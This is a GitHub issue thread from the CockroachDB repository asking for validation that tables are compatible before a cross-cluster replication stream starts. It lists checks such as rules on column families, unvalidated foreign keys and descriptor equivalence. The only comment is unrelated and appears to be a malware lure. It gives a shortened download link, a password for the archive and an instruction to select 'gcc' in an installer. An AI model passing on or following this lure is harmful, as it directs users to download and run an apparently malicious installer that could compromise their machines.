### ISSUE TITLE
crosscluster: validate that tables are compatible when creating a replication stream

### ISSUE THREAD

**Issue by rafiss** [cockroachdb/cockroach#129729]
See https://docs.google.com/document/d/1Wj-6lu7N4p3vPGJ9qDPBbu9Vu8haTpcZ4Z5cKzYTE7c/edit

When a stream is about to begin (i.e. during dist sql planning), we should add certain checks that the data associated with the in memory src descriptors will replicate nicely to the destination descriptors. This validation list is not exhaustive but could include:

- Table Level
  - Disallow Column families (to be removed for 24.3)
  - Not null columns in a column families (need staged mode to lift this restriction)
  - Foreign Keys must be unvalidated, if kv write path is used
  - Table Descriptor equivalency: for exampel, columns must match, unless an applier UDF is used, in which case, the user is on their own. 
- Database Level - No need for this in 24.3
  - Fully qualified table names must match (i.e. databaseName.schemaName.TableName). Maybe we can relax this in the future, but i don’t feel like being in this business. 
  - Table level checks above must pass.

Epic CRDB-38974

Jira issue: CRDB-41694

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
